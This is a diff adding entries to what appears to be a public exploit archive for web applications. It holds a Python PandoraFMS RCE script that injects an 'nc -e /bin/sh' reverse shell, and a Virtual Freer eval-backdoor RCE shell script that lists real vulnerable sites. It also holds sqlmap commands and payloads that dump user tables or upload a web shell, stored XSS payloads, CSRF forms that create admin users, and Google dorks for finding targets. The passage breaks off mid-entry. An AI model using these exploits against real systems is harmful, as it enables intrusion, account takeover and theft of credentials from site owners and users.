+This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
+incase default vulnerable variable won't work, change the position of payload to  one of the following ip_src, dst_port, src_port
+
+Author: Engin Demirbilek
+Github: github.com/EnginDemirbilek
+CVE: CVE-2020-8947
+
+'''
+import requests
+import sys
+
+if len(sys.argv) < 6:
+	print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
+	exit()
+
+url = sys.argv[1]
+user = sys.argv[2]
+password = sys.argv[3]
+payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'
+
+login = {
+	'nick':user,
+	'pass':password,
+	'login_button':'Login'
+}
+req = requests.Session()
+print "Sendin login request ..."
+login = req.post(url+"/pandora_console/index.php?login=1", data=login)
+
+payload = {
+	'date':"",
+	'time':"",
+	'period':"",
+	'interval_length':"",
+	'chart_type':"",
+	'max_aggregates':"1",
+        'address_resolution':"0",
+        'name':"",
+        'assign_group':"0",
+        'filter_type':"0",
+        'filter_id':"0",
+        'filter_selected':"0",
+        'ip_dst':payload,
+	'ip_src':"",
+	'dst_port':"",
+	'src_port':"",
+	'advanced_filter':"",
+	'aggregate':"dstip",
+	'router_ip':"",
+	'output':"bytes",
+	'draw_button':"Draw"
+}
+
+print "[+] Sendin exploit ..."
+
+exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
+'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
+'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+'Accept-Encoding':'gzip, deflate',
+'Content-Type':'application/x-www-form-urlencoded'})
+
+if exploit.status_code == 200:
+	print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
+else:
+	print "[-] Couldn't send the HTTP request, try again."
\ No newline at end of file
diff --git a/exploits/php/webapps/48066.txt b/exploits/php/webapps/48066.txt
new file mode 100644
index 000000000..a3bbc2ad7
--- /dev/null
+++ b/exploits/php/webapps/48066.txt
@@ -0,0 +1,47 @@
+# Title: phpMyChat Plus 1.98 - 'pmc_username' SQL Injection
+# Date: 2020-02-13
+# Exploit Author: J3rryBl4nks
+# Vendor Homepage: http://ciprianmp.com/latest/
+# Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChat_Plus/
+# Version MyChat Plus 1.98
+# Tested on Windows 10/Kali Rolling
+
+# The phpMyChat Plus 1.98 application is vulnerable to Sql Injection 
+# (Boolean based blind, Error-based, time-based blind) on the deluser.php page 
+# through the pmc_user parameter.
+
+# POC code:
+# Capture the request through Burpsuite:
+
+POST /plus/deluser.php HTTP/1.1
+Host: HOSTNAME
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://HOSTNAME/plus/deluser.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 77
+Connection: close
+Cookie: CookieLang=english; temp=temp; CookieUsername=testing; CookieRoom=Public%2BRoom%2B1; CookieRoomType=1; CookieStatus=r; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9
+Upgrade-Insecure-Requests: 1
+
+L=english&Link=&LIMIT=0&pmc_username=test&pmc_password=test&login_form=Log+In
+
+
+# Then use sqlmap to get the user tables:
+
+sqlmap -r deleteuserlogin.req --level=5 --risk=3 --dbms=mysql --tamper=unmagicquotes -D DBNAME --dump -T c_reg_users -p pmc_username
+
+Parameter: pmc_username (POST)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND 9736=(SELECT (CASE WHEN (9736=9736) THEN 9736 ELSE (SELECT 2847 UNION SELECT 9983) END))-- qEHq&pmc_password=test&login_form=Log In
+
+Type: error-based
+Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+Payload: L=english&Link=&LIMIT=0&pmc_username=test' OR (SELECT 7708 FROM(SELECT COUNT(*),CONCAT(0x7170627a71,(SELECT (ELT(7708=7708,1))),0x7162627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShDx&pmc_password=test&login_form=Log In
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND (SELECT 5588 FROM (SELECT(SLEEP(5)))wWnk)-- FHPh&pmc_password=test&login_form=Log In
\ No newline at end of file
diff --git a/exploits/php/webapps/48074.txt b/exploits/php/webapps/48074.txt
new file mode 100644
index 000000000..4e099bd4e
--- /dev/null
+++ b/exploits/php/webapps/48074.txt
@@ -0,0 +1,61 @@
+# Exploit Title: SOPlanning 1.45 - 'by' SQL Injection
+# Date: 2020-02-14
+# Exploit Author: J3rryBl4nks
+# Vendor Homepage: https://www.soplanning.org/en/
+# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
+# Version 1.45
+# Tested on Windows 10/Kali Rolling
+
+# The SOPlanning application is vulnerable to SQL Injection in the OrderBy clause of the sort on the Projects page:
+# POC:
+# The SOPlanning 1.45 application is vulnerable to SQL Injection which can be leveraged into getting the information for the users table.
+
+# Capture the request in Burpsuite:
+
+GET /soplanning/www/projets.php?order=nom_createur&by=ASC HTTP/1.1
+Host: HOSTNAME
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://HOST/soplanning/www/projets.php?order=charge&by=ASC
+Connection: close
+Cookie: xposMois=0; dateDebut=14/02/2020; dateFin=14/04/2020; xposMoisWin=0; xposJoursWin=0; xposJours=0; yposMoisWin=0; yposMois=0; yposJoursWin=0; yposJours=0; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9; soplanningplanning_=pnljrmetd5cse4d8dm1f09fn0u; baseLigne=users; baseColonne=jours; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%5D
+Upgrade-Insecure-Requests: 1
+
+# Feed the request into SQLMap:
+
+sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump
+
+
+
+Then you will be able to see the information for the users in the database:
+
+root@kali:~/SOPlanning# sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump
+___
+__H__
+___ ___[(]_____ ___ ___ {1.4.1.2#dev}
+|_ -| . [,] | .'| . |
+|___|_ [)]_|_|_|__,| _|
+|_|V... |_| http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+[*] starting @ 11:13:27 /2020-02-14/
+
+[11:13:27] [INFO] parsing HTTP request from 'projects.req'
+[11:13:27] [INFO] testing connection to the target URL
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: by (GET)
+Type: boolean-based blind
+Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
+Payload: order=nom_createur&by=ASC,(SELECT (CASE WHEN (6871=6871) THEN 1 ELSE 6871*(SELECT 6871 FROM INFORMATION_SCHEMA.PLUGINS) END))
+
+Type: time-based blind
+Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
+Payload: order=nom_createur&by=ASC PROCEDURE ANALYSE(EXTRACTVALUE(9535,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x77464654))))),1)
+---
+
+
+Because it's time based it will take a while to retrieve the user details, but you will retrieve password hashes.
\ No newline at end of file
diff --git a/exploits/php/webapps/48076.txt b/exploits/php/webapps/48076.txt
new file mode 100644
index 000000000..cb8272a90
--- /dev/null
+++ b/exploits/php/webapps/48076.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Wordpress Plugin Strong Testimonials 2.40.0 - Persistent Cross-Site Scripting
+# Date: 2020-01-23
+# Vendor Homepage: https://strongtestimonials.com
+# Vendor Changelog: https://github.com/MachoThemes/strong-testimonials/blob/master/changelog.txt
+# Exploit Author: Jinson Varghese Behanan
+# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-strong-testimonials-plugin/
+# Author Homepage: https://www.jinsonvarghese.com
+# Version: 2.40.0 and below
+# CVE : CVE-2020-8549
+
+# 1. Description
+# Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with 
+# over 90,000 active installations. In the client details section which is seen when adding 
+# or editing a testimonial, the custom[client_name] and custom[company_name] parameters 
+# were found to be vulnerable to stored cross-site scripting. All WordPress websites 
+# using Strong Testimonials version 2.40.0 and below are affected.
+
+2. Proof of Concept
+
+When the testimonial is added to a page on the site, the XSS payload passed in both of the above mentioned vulnerable parameters get executed.
+
+The payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page.
+
+POST /wp-admin/post.php HTTP/1.1
+Host: testing.com
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://testing.com/wp-admin/post.php?post=24879&action=edit
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1402
+Origin: http://testing.com
+Connection: close
+Cookie: wordpress_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7Cbf600418ab822f99fc55eb651acb102beaa01b055292c0f9d84667c7b490c60c; wp-saving-post=24879-check; wordpress_cf_adm_use_adm=1; wp-settings-time-1=1581780228; PHPSESSID=aeb50c30210014eec857909f45b3fbf3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7C376e10c1fa5aeea389a485d0475f4c7dfe659f41d3b21f1b0bf6435838c003c5; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg
+Upgrade-Insecure-Requests: 1
+
+_wpnonce=001abb6a10&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=wpm-testimonial&original_post_status=publish&referredby=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&post_ID=24879&meta-box-order-nonce=b39d630598&closedpostboxesnonce=6436439491&original_post_title=XSS+Test&post_title=XSS+Test&samplepermalinknonce=d93284f5e5&content=&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=01&jj=22&aa=2020&hh=18&mn=02&ss=28&hidden_mm=01&cur_mm=02&hidden_jj=22&cur_jj=15&hidden_aa=2020&cur_aa=2020&hidden_hh=18&cur_hh=15&hidden_mn=02&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bwpm-testimonial-category%5D%5B%5D=0&newwpm-testimonial-category=New+Category+Name&newwpm-testimonial-category_parent=-1&_ajax_nonce-add-wpm-testimonial-category=f7661627a5&menu_order=0&_thumbnail_id=-1&custom%5Bclient_name%5D=%3Cscript%3Ealert%28%27all+testimonials+page%27%29%3C%2Fscript%3E&custom%5Bemail%5D=&custom%5Bcompany_name%5D=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custom%5Bcompany_website%5D=&custom%5Bnofollow%5D=default&excerpt=&post_name=creator
+
+3. Timeline
+
+Vulnerability reported to the Strong Testimonials team – January 23, 2020
+Strong Testimonials version 2.40.1 containing the fix released – January 25, 2020
\ No newline at end of file
diff --git a/exploits/php/webapps/48082.txt b/exploits/php/webapps/48082.txt
new file mode 100644
index 000000000..7d3a6be57
--- /dev/null
+++ b/exploits/php/webapps/48082.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
+# Date: 2020-02-14
+# Exploit Author: J3rryBl4nks
+# Vendor Homepage: https://icehrm.com/
+# Software Link: https://sourceforge.net/projects/icehrm/#Version 26.2.0
+# Tested on Windows 10/Kali Rolling
+
+# The Ice HRM Web Application is vulnerable to CSRF that leads to arbitrary user creation or password change:
+
+# POC for user creation:
+ 
+    <html>
+      <body>
+      <script>history.pushState('', '', '/')</script>
+        <form action="http://HOSTHERE/icehrm/app/service.php">
+          <input type="hidden" name="t" value="User" />
+          <input type="hidden" name="a" value="ca" />
+          <input type="hidden" name="sa" value="saveUser" />
+          <input type="hidden" name="mod" value="admin&#61;users" />
+          <input type="hidden" name="req" value="&#123;"username"&#58;"test"&#44;"email"&#58;"test&#64;test&#46;com"&#44;"employee"&#58;"1"&#44;"user&#95;level"&#58;"Admin"&#44;"user&#95;roles"&#58;"&#91;&#92;"2&#92;"&#93;"&#44;"lang"&#58;"NULL"&#44;"default&#95;module"&#58;"NULL"&#44;"csrf"&#58;"c0bdded55472fab56c578386143a1854e6f8dd11"&#125;" />
+          <input type="submit" value="Submit request" />
+        </form>
+      </body>
+    </html>
+
+#    POC for Password Change:
+
+    <html>
+      <body>
+      <script>history.pushState('', '', '/')</script>
+        <form action="http://HOSTHERE/icehrm/app/service.php">
+          <input type="hidden" name="t" value="User" />
+          <input type="hidden" name="a" value="ca" />
+          <input type="hidden" name="sa" value="changePassword" />
+          <input type="hidden" name="mod" value="admin&#61;users" />
+          <input type="hidden" name="req" value="&#123;"id"&#58;1&#44;"pwd"&#58;"admin123"&#125;" />
+          <input type="submit" value="Submit request" />
+        </form>
+      </body>
+    </html>
\ No newline at end of file
diff --git a/exploits/php/webapps/48083.txt b/exploits/php/webapps/48083.txt
new file mode 100644
index 000000000..52bcd402c
--- /dev/null
+++ b/exploits/php/webapps/48083.txt
@@ -0,0 +1,25 @@
+# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
+# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"
+# Date: 2020-02-14
+# Category : Webapps
+# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip
+# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful
+# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
+# Team Members: Behzad Khalifeh , Milad Ranjbar
+# Version: 3.8
+# Tested on: Windows/Linux
+# CVE: N/A
+
+.:: Theme Description ::.
+Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design.
+
+.:: Proof Of Concept (PoC) ::.
+Step 1 - Find Your Target With above Dork.
+Step 2 - Inject Your Java Script Codes to Name & Email Fields
+Step 3 - Click Post Comment
+
+.:: Tested Payload ::.
+'>"><script>alert(/XSS By UltraSecurity/)</script>
+
+.:: Post Request ::.
+comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145
\ No newline at end of file
diff --git a/exploits/php/webapps/48086.txt b/exploits/php/webapps/48086.txt
new file mode 100644
index 000000000..5f4a6cd67
--- /dev/null
+++ b/exploits/php/webapps/48086.txt
@@ -0,0 +1,69 @@
+# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
+# Date: 2020-02-14
+# Exploit Author: J3rryBl4nks
+# Vendor Homepage: https://www.soplanning.org/en/
+# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
+# Version 1.45
+# Tested on Windows 10/Kali Rolling
+
+# The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary 
+# user creation and for changing passwords (Specifically the admin password)
+
+# POC For aribtrary user creation:
+# CSRF POC:
+
+
+<html>
+<body>
+<script>history.pushState('', '', '/')</script>
+<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
+<input type="hidden" name="xajax" value="submitFormUser" />
+<input type="hidden" name="xajaxr" value="1581700271752" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="1" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="Test" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="test" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="&#35;FFFFFF" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><e><k>0<&#47;k><v>users&#95;manage&#95;all<&#47;v><&#47;e><e><k>1<&#47;k><v>projects&#95;manage&#95;all<&#47;v><&#47;e><e><k>2<&#47;k><v>projectgroups&#95;manage&#95;all<&#47;v><&#47;e><e><k>3<&#47;k><v>tasks&#95;modify&#95;all<&#47;v><&#47;e><e><k>4<&#47;k><v>tasks&#95;view&#95;all&#95;projects<&#47;v><&#47;e><e><k>5<&#47;k><v>tasks&#95;view&#95;all&#95;users<&#47;v><&#47;e><e><k>6<&#47;k><v>lieux&#95;all<&#47;v><&#47;e><e><k>7<&#47;k><v>ressources&#95;all<&#47;v><&#47;e><e><k>8<&#47;k><v>audit&#95;restore<&#47;v><&#47;e><e><k>9<&#47;k><v>parameters&#95;all<&#47;v><&#47;e><e><k>10<&#47;k><v>stats&#95;users<&#47;v><&#47;e><e><k>11<&#47;k><v>stats&#95;projects<&#47;v><&#47;e><&#47;xjxobj>" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><&#47;xjxobj>" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+# POC for admin password change:
+
+# CSRF POC:
+
+<html>
+<body>
+<script>history.pushState('', '', '/')</script>
+<form action="http://HOSTNAME/soplanning/www/process/xajax_server.php" method="POST">
+<input type="hidden" name="xajax" value="submitFormProfil" />
+<input type="hidden" name="xajaxr" value="1581702103306" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="ADM" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="admin123" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="fr" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
+<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/48089.txt b/exploits/php/webapps/48089.txt
new file mode 100644
index 000000000..7dcfdb2a8
--- /dev/null
+++ b/exploits/php/webapps/48089.txt
@@ -0,0 +1,67 @@
+# Exploit Title: SOPlanning 1.45 - 'users' SQL Injection
+# Date: 2020-02-14
+# Exploit Author: J3rryBl4nks, Homebrewer
+# Vendor Homepage: https://www.soplanning.org/en/
+# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
+# Version 1.45
+# Tested on Windows 10/Kali Rolling
+
+The SOPlanning application is vulnerable to SQL Injection that leads to Remote Code Execution.
+
+Exploit POC:
+
+Once you have extracted the admin hash, you can now use that to get command execution on the machine through another SQL Injection.
+
+Save the admin hash and insert it into SQLMap as such:
+
+sqlmap -u 'http://HOSTHERE/soplanning/www/export_ical.php?login=admin&hash=HASHHERE&nocache&users=ADM&age=3' -p users --risk=3 --level=5 --threads=10 --dbms=mysql --keep-alive --os-shell\
+
+
+Now you have a web shell uploaded to the server:
+
+11:52:31] [INFO] GET parameter 'users' is 'MySQL UNION query (NULL) - 41 to 60 columns' injectable
+GET parameter 'users' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+sqlmap identified the following injection point(s) with a total of 2122 HTTP(s) requests:
+---
+Parameter: users (GET)
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') AND (SELECT 6911 FROM (SELECT(SLEEP(5)))GfEH) AND ('gglk'='gglk&age=3
+
+Type: UNION query
+Title: MySQL UNION query (NULL) - 42 columns
+Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x4e6564784469636f6a4f5867627a44744f517452677545755a455a694c4d676f436a776f66645547,0x716a707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&age=3
+---
+[11:53:02] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.41, PHP 7.2.26
+back-end DBMS: MySQL >= 5.0.12
+[11:53:02] [INFO] going to use a web backdoor for command prompt
+[11:53:02] [INFO] fingerprinting the back-end DBMS operating system
+[11:53:02] [INFO] the back-end DBMS operating system is Windows
+which web application language does the web server support?
+[1] ASP
+[2] ASPX
+[3] JSP
+[4] PHP (default)
+> 4
+do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
+[11:53:07] [WARNING] unable to automatically retrieve the web server document root
+what do you want to use for writable directory?
+[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
+[2] custom location(s)
+[3] custom directory list file
+[4] brute force search
+> 2
+please provide a comma separate list of absolute directory paths: C:\xampp\htdocs\soplanning\www
+[11:53:23] [WARNING] unable to automatically parse any web server path
+[11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via LIMIT 'LINES TERMINATED BY' method
+[11:53:23] [WARNING] unable to upload the file stager on 'C:/xampp/htdocs/soplanning/www/'
+[11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via UNION method
+[11:53:23] [WARNING] expect junk characters inside the file as a leftover from UNION query
+[11:53:23] [INFO] the remote file 'C:/xampp/htdocs/soplanning/www/tmpubhkt.php' is larger (768 B) than the local file '/tmp/sqlmapi5F_1P150931/tmpEOtI5R' (727B)
+[11:53:23] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/soplanning/www/' - http://HOST/soplanning/www/tmpubhkt.php
+
+
+Using that webshell you can upload your reverse shell.
+
+Mad props to : https://twitter.com/HackingHomebre1 for the POC creation and assist.
\ No newline at end of file
diff --git a/exploits/php/webapps/48094.py b/exploits/php/webapps/48094.py
new file mode 100755
index 000000000..8759bbe3b
--- /dev/null
+++ b/exploits/php/webapps/48094.py
@@ -0,0 +1,113 @@
+# Exploit title : Virtual Freer 1.58 - Remote Command Execution
+# Exploit Author : SajjadBnd
+# Date : 2020-02-17
+# Vendor Homepage : http://freer.ir/virtual/
+# Software Link : http://www.freer.ir/virtual/download.php?action=get
+# Software Link(mirror) : http://dl.nuller.ir/virtual_freer_v1.58[NuLLeR.iR].zip
+# Tested on : Ubuntu 19.10
+# Version : 1.58
+############################
+# [ DESCRIPTION ]
+#
+# Free Script For Sell Charging Cards and Virtual Products
+#
+# [POC]
+#
+# Vulnerable file:  /include/libs/nusoap.php
+# 943: eval($_POST['a74ad8dfacd4f985eb3977517615ce25']);
+#
+# POST /include/libs/nusoap.php
+# payload : a74ad8dfacd4f985eb3977517615ce25=system('uname -a');
+#
+# [ Sample Vulnerable Sites ]
+#
+# http://3cure.ir/buy/
+# http://cheapcharger.ir/
+# http://www.appraworld.ir/
+# http://latoon.ir/
+# http://novinv.ir/
+#
+
+import requests
+import os
+import sys
+
+def clear():
+    linux = 'clear'
+    windows = 'cls'
+    os.system([linux, windows][os.name == 'nt'])
+
+def Banner():
+        print '''
+#################################################
+#                                               #
+# Virtual Freer 1.58 - Remote Command Execution #
+#                    SajjadBnd                  #
+#		   BiskooitPedar		#
+#		blackwolf@post.com		#
+#################################################
+'''
+
+def inputs():
+    target = raw_input('[*] URL : ')
+    while True:
+	try:
+            r = requests.get(target,verify=False)
+            start(target)
+        except requests.exceptions.MissingSchema:
+	    target = "http://" + target
+
+def start(target):
+    print "======================\n\n[!] Checking: ****()"
+    url = '%s/include/libs/nusoap.php' % (target)
+    body = {'a74ad8dfacd4f985eb3977517615ce25':'echo vulnerable;'}
+    r = requests.post(url,data=body,allow_redirects=False,timeout=50)
+    content = r.text.encode('utf-8')
+    if 'vulnerable' in content:
+        print "[+] vulnerable: ****()\n"
+    else:
+        print "[-] Target not Vulnerable!"
+	sys.exit(1)
+    print "\n[!] Checking: System()"
+    body = {'a74ad8dfacd4f985eb3977517615ce25':'system(id);'}
+    r = requests.post(url,data=body,allow_redirects=False,timeout=50)
+    content = r.text.decode('utf-8')
+    if 'gid' in content:
+        print "[+] vulnerable: system()\n"
+	osshell(url)
+    else:
+        print "[-] Target not Vulnerable to Running OS Commands!"
+	evalshell(url)
+
+def osshell(url):
+    print "======================\n[+] You can run os commands :D\n"
+    while True:
+	try:
+            cmd = raw_input('OS_SHELL $ ')
+            command = "system('%s');" % (cmd)
+            body = {'a74ad8dfacd4f985eb3977517615ce25':command}
+            r = requests.post(url,data=body,allow_redirects=False,timeout=50)
+            content = r.text.encode('utf-8')
+            print "\n",content
+        except KeyboardInterrupt:
+            print "\n____________________\n[+] GoodBye :D"
+            sys.exit(1)
+
+def evalshell(url):
+    print "======================\n[+] You can just run Eval Commands :D\n"
+    while True:
+	try:
+            cmd = raw_input('\nEval()=> ')
+            command = '%s;' % (cmd)
+            body = {'a74ad8dfacd4f985eb3977517615ce25':command}
+            r = requests.post(url,data=body,allow_redirects=False,timeout=50)
+            content = r.text.encode('utf-8')
+            print "\n",content
+        except KeyboardInterrupt:
+            print "\n____________________\n[+] ok! GoodBye :D"
+            sys.exit(1)
+
+if __name__ == '__main__':
+        clear()
+        Banner()
+	inputs()
\ No newline at end of file
diff --git a/exploits/php/webapps/48099.txt b/exploits/php/webapps/48099.txt
new file mode 100644
index 000000000..8dbd5175b
--- /dev/null
+++ b/exploits/php/webapps/48099.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
+# Author: indoushka
+# Date: 2020-02-20
+# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)
+# Vendor: http://easy2pilot-v7.com/
+# CVE: N/A
+
+#poc :
+
+[+] Dorking İn Google Or Other Search Enggine.
+
+[+] save code as poc.html
+
+[+] 
+
+<!DOCTYPE html>
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head profile="http://www.w3.org/2005/10/profile">
+<script data-ad-client="ca-pub-6748326038387042" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
+</tr>
+                    </table>
+                <br/><br/>
+        <form action="https://immosl.lu/admin.php?action=add_user" method="POST">
+            <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">
+                <tr>
+                    <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>
+                </tr>
+                <tr>
+                    <td class="tah11" align="right">Nom d'utilisateur :</td>
+                    <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>
+                </tr>
+                <tr>
+                    <td class="tah11" align="right">Mot de passe : </td>
+                    <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>
+                </tr>
+                <tr>
+                    <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>
+                </tr>
+            </table>
+        </form><br/><br/>
+<div>
+	
+
+Greetings to :=========================================================================================================================
+                                                                                                                                      |
+jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
+                                                                                                                                      |
+=======================================================================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48106.txt b/exploits/php/webapps/48106.txt
new file mode 100644
index 000000000..d78d939d1
--- /dev/null
+++ b/exploits/php/webapps/48106.txt
@@ -0,0 +1,72 @@
+# Exploit Title: GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
+# Google Dork: intext:"© GUnet 2003-2007" 	
